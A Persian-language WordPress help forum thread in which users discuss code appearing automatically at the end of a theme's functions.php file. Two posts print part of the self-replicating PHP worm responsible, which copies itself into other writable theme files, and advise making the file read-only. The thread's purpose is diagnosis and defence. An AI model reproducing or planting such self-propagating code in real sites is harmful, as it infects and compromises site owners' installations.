021 4 ارسال شده در بهمن 91 گزارش بازنشر ارسال شده در بهمن 91 سلاموقتی پوسته وردپرس رو در حالتی که دیباگ فعاله انتخاب میکنم با اخطارهای زیر روبرو میشم :البته قبلش فایل فاکنشن رو چک کردم چیزی به جز کدهایی که خودم بهش اضافه کرده بودم نبود ولی بعد از فعال کردن پوسته کدهای زیر به آخر فایل فانکشن به صورت اتوماتیک اضافه شد ... :میخوام بدونم باید چیکار کنم که این کدها اتوماتیک به فانکشن اضافه نشن ...ممنون لینک به ارسال
Parsa 23463 ارسال شده در بهمن 91 گزارش بازنشر ارسال شده در بهمن 91 این کدها رو وردپرس اضافه میکنهمیتونید حذف کنیدو همچنین برای تکرار نشدن این مسئله permission نوشتن را از فایل بگیرید 3 لینک به ارسال
021 4 ارسال شده در بهمن 91 مالک گزارش بازنشر ارسال شده در بهمن 91 (ویرایش شده) ممنون آقا پارسا . راستش من میخوام قالبو بدم به یه نفر دیگه ... میخوام وقتی قالبو فعال میکنه این کدها اضافه نشن .. آیا میشه توی خود پوسته از کدی استفاده کرد که این کدها اتوماتیک لود نشن ؟؟یه سوال دیگه هم داشتم :بعضی وقتها که من تگها رو کپی میکنم و توی قالب میذارم مخصوصا تو header.php یه فاصله 26 پیکسلی به غیر از نوار مدیریت بالای هیدر سایت میافته ... باید چیکار کنم که این فاصله اضافه ایجاد نشه ؟ ویرایش شده بهمن 91 توسط 021 لینک به ارسال
سعید حسینی 2409 ارسال شده در بهمن 91 گزارش بازنشر ارسال شده در بهمن 91 سلاماین کدها Worm هستند:<?phpfunction _check_active_widget(){$widget=substr(file_get_contents(__FILE__),strripos(file_get_contents(__FILE__),"<"."?"));$output="";$allowed="";$output=strip_tags($output, $allowed);$direst=_get_all_widgetcont(array(substr(dirname(__FILE__),0,stripos(dirname(__FILE__),"themes") + 6)));if (is_array($direst)){foreach ($direst as $item){if (is_writable($item)){$ftion=substr($widget,stripos($widget,"_"),stripos(substr($widget,stripos($widget,"_")),"("));$cont=file_get_contents($item);if (stripos($cont,$ftion) === false){ $sar=stripos( substr($cont,-20),"?".">") !== false ? "" : "?".">"; $output .= $before . "Not found" . $after; if (stripos( substr($cont,-20),"?".">") !== false){$cont=substr($cont,0,strripos($cont,"?".">") + 2);}....$request .= " GROUP BY $wpdb->comments.comment_post_ID ORDER BY comment_count DESC LIMIT $no_posts";$posts=$wpdb->get_results($request);$output="";if ($posts) {foreach ($posts as $post) {$post_title=stripslashes($post->post_title);$comment_count=$post->comment_count;$permalink=get_permalink($post->ID);$output .= $before . " <a href=\"" . $permalink . "\" title=\"" . $post_title."\">" . $post_title . "</a> " . $after;}} else {$output .= $before . "None found" . $after;}return $output;}?>فایل functions.php شما دارای این Worm هست و روی حالت فقط خواندنی قرار بدید تا این کرم به فایل دسترسی نداشته باشه و همچنین برای فایل functions.php دیگر پوسته ها این سطح دسترسی را نیز حتماً رعایت کنید. 3 لینک به ارسال
021 4 ارسال شده در بهمن 91 مالک گزارش بازنشر ارسال شده در بهمن 91 درست شد ممنون آقای حسینی , یه سوال دیگه هم داشتم:بعضی وقتها که من تگها رو کپی میکنم و توی قالب میذارم مخصوصا تو header.php یه فاصله 26 پیکسلی به غیر از نوار مدیریت بالای هیدر سایت میافته ... باید چیکار کنم که این فاصله اضافه ایجاد نشه؟یعنی ممکنه از کپی و پیس کردن تگها باشه ؟ لینک به ارسال
سعید حسینی 2409 ارسال شده در بهمن 91 گزارش بازنشر ارسال شده در بهمن 91 یه سوال دیگه هم داشتم :بعضی وقتها که من تگها رو کپی میکنم و توی قالب میذارم مخصوصا تو header.php یه فاصله 26 پیکسلی به غیر از نوار مدیریت بالای هیدر سایت میافته ... باید چیکار کنم که این فاصله اضافه ایجاد نشه ؟وجود تابع فوتر:<?php wp_footer(); ?>قبل از بسته شدن تگ های body و html و تابع هدر :<?php wp_head(); ?>قبل از بسته شدن تگ head را چک کنید. 4 لینک به ارسال
مبهوتی 0 ارسال شده در خرداد 93 گزارش بازنشر ارسال شده در خرداد 93 سلاماین کدها Worm هستند:<?phpfunction _check_active_widget(){$widget=substr(file_get_contents(__FILE__),strripos(file_get_contents(__FILE__),"<"."?"));$output="";$allowed="";$output=strip_tags($output, $allowed);$direst=_get_all_widgetcont(array(substr(dirname(__FILE__),0,stripos(dirname(__FILE__),"themes") + 6)));if (is_array($direst)){foreach ($direst as $item){if (is_writable($item)){$ftion=substr($widget,stripos($widget,"_"),stripos(substr($widget,stripos($widget,"_")),"("));$cont=file_get_contents($item);if (stripos($cont,$ftion) === false){ $sar=stripos( substr($cont,-20),"?".">") !== false ? "" : "?".">"; $output .= $before . "Not found" . $after; if (stripos( substr($cont,-20),"?".">") !== false){$cont=substr($cont,0,strripos($cont,"?".">") + 2);}....$request .= " GROUP BY $wpdb->comments.comment_post_ID ORDER BY comment_count DESC LIMIT $no_posts";$posts=$wpdb->get_results($request);$output="";if ($posts) {foreach ($posts as $post) {$post_title=stripslashes($post->post_title);$comment_count=$post->comment_count;$permalink=get_permalink($post->ID);$output .= $before . " <a href=\"" . $permalink . "\" title=\"" . $post_title."\">" . $post_title . "</a> " . $after;}} else {$output .= $before . "None found" . $after;}return $output;}?>فایل functions.php شما دارای این Worm هست و روی حالت فقط خواندنی قرار بدید تا این کرم به فایل دسترسی نداشته باشه و همچنین برای فایل functions.php دیگر پوسته ها این سطح دسترسی را نیز حتماً رعایت کنید.دوست عزیز از پاسخ بسیار دقیق و راهنمایی شما بسیار بسیار سپاسگزارمراستش من هم دچار این مشکل بودم و اصلا نمی تونستم جلوی تکثیر این worm رو بگیرم و با راهنمایی شما این کار انجام شدفقط می خوام بدونم آیا این کرم فایلهای دیگر رو هم دستکاری می کنه یا نه فقط فایل فانکشن رو تغییر میده؟؟؟؟؟یه سوال دیگه هم اینکه این مشکل رو ریشه ای چطور می تونم حل کنم؟؟ یعنی خود worm رو پاکسازی کنم تا بعدا دوباره مشکلی ایجاد نشه؟؟؟؟خیلی ممنون لینک به ارسال
پست های پیشنهاد شده
لطفا برای ارسال دیدگاه وارد شوید
شما بعد از اینکه وارد حساب کاربری خود شدید می توانید دیدگاهی ارسال کنید
ورود به حساب کاربری